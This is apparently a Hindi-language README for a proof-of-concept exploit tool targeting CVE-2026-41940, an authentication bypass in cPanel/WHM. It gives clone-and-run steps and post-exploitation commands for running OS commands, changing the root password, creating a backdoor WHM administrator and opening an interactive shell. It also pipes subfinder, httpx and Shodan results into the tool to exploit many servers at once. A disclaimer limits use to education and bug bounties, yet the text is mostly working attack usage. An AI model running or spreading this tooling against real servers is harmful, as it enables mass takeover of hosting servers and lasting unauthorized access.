
CVE-2026-41940 के लिए एक्सप्लॉइट, cPanel/WHM में एक बिना प्रमाणीकरण वाला प्रमाणीकरण बायपास, जो CRLF सेशन इंजेक्शन के माध्यम से रूट-स्तरीय WHM एक्सेस प्रदान करता है, साथ ही पोस्ट-एक्सप्लॉइटेशन कमांड और इंटरैक्टिव शेल के साथ।
⚠ यह उपकरण केवल शैक्षिक या बग बाउंटी उद्देश्य के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग सख्त वर्जित है।
CVE-2026-41940 का शोषण करने के लिए एक उपकरण, जो cPanel और WHM में एक गंभीर प्रमाणीकरण बाईपास (CVSS 10.0) है, जो बिना प्रमाणीकरण वाले हमलावरों को Authorization हेडर के माध्यम से सर्वर-साइड सत्र फ़ाइलों में CRLF अनुक्रम इंजेक्ट करके रूट-स्तरीय WHM पहुंच प्राप्त करने की अनुमति देता है — कोई क्रेडेंशियल आवश्यक नहीं।
CVE-2026-41940, सामान्य शब्दों में, cPanel/WHM में प्रमाणीकरण सत्रों को संभालने के तरीके में खराबी के माध्यम से शोषित किया जाता है। हमला आम तौर पर लॉगिन इंटरफ़ेस पर एक सामान्य अनुरोध के साथ शुरू होता है, जहां एप्लिकेशन उपयोगकर्ता क्रेडेंशियल्स को पूरी तरह से सत्यापित करने से पहले एक सत्र को समय से पहले आरंभ करता है। सत्र-संबंधी इनपुट के अनुचित प्रबंधन के कारण, कुछ विशेष रूप से तैयार या अप्रत्याशित इनपुट संरचनाएं बदल सकती हैं कि सर्वर द्वारा सत्र डेटा को कैसे संग्रहीत या व्याख्या किया जाता है।
| संस्करण | असुरक्षित | पैच किया गया |
|---|---|---|
| 110.x | ≤ 11.110.0.96 | 11.110.0.97 |
| 118.x | ≤ 11.118.0.62 | 11.118.0.63 |
| 126.x | ≤ 11.126.0.53 | 11.126.0.54 |
| 132.x | ≤ 11.132.0.28 | 11.132.0.29 |
| 134.x | ≤ 11.134.0.19 | 11.134.0.20 |
| 136.x | ≤ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/pemarine/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows
python cve.py
# MacOS/Linux
python3 cve.py
उपकरण एक लक्ष्य डोमेन निर्दिष्ट करने की अपेक्षा करता है।
एकल लक्ष्य मोड:
python cve.py -u https://target1.com:2083
आप target.txt फ़ाइल से भी स्कैन कर सकते हैं (इसे बनाएं):
python cve.py -l target.txt -t 50 -o result.json
उपलब्ध कमांड:
python cve.py -u https://victim1.com:2083 # single target scan
python cve.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python cve.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.
# List all accounts on the server
python cve.py list -u https://target.com:2087
# OS command
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"
# Get server info (hostname, disk, MySQL host)
python cve.py info -u https://target.com:2087
# Change root password
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'
# Interactive WHM shell
python cve.py shell -u https://target.com:2087
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
httpx -silent -ports 2085,2086 -threads 50 | \
python cve.py scan -t 40 -o results.json
# From scope list
cat scope.txt | \
httpx -silent -ports 2085,2086 -threads 100 | \
python cve.py scan -t 30 -o results.json
# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python cve.py -t 30 -o shodan_results.json
# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python cve.py -t 20 --action list
सफल निष्पादन के बाद, आप एक इंटरैक्टिव WHM शेल खोल सकते हैं:
python cve.py shell -u
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
[--action ACTION] [--passwd PASS] [--cmd CMD]
[--new-user USER] [--new-domain DOMAIN]
[-o OUTPUT]
Target:
-u, --url URL Single target URL (e.g. https://host:2087)
-l, --list LIST File with URLs (one per line)
--hostname HOSTNAME Override canonical Host header (auto-discovered)
Scan:
-t, --threads N Concurrent threads (default: 10)
--timeout N Request timeout seconds (default: 15)
--rate-limit N Delay between targets (default: 0)
--force Skip cPanel detection check
Post-Exploit:
--action ACTION Action: list | passwd | cmd | exec | info |
version | shell | adduser
--passwd PASS New root password (--action passwd)
--cmd CMD OS command (--action cmd/exec)
--new-user USER New cPanel username (--action adduser)
--new-domain DOMAIN New cPanel domain (--action adduser)
Output:
-o, --output FILE Save results to JSON file
--no-color Disable ANSI colors
⚠ यह उपकरण केवल शैक्षिक या बग बाउंटी उद्देश्य के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग सख्त वर्जित है।
| कमांड | विवरण |
|---|
id | उपयोगकर्ता आईडी दिखाएं |
hostname | सर्वर का होस्टनाम प्राप्त करें |
accounts | सभी उपयोगकर्ता खातों की सूची बनाएं |
info | लोड, डिस्क, MySQL होस्ट, संस्करण |
cat <path> | फ़ाइल सामग्री पढ़ें |
exec <cmd> | OS कमांड निष्पादित करें |
newadmin <user> <pass> | बैकडोर WHM व्यवस्थापक बनाएं |
passwd <pass> | रूट पासवर्ड बदलें |
l [path] | निर्देशिका सूचीबद्ध करें |
help | सभी कमांड दिखाएं |
exit | शेल मोड से बाहर निकलें |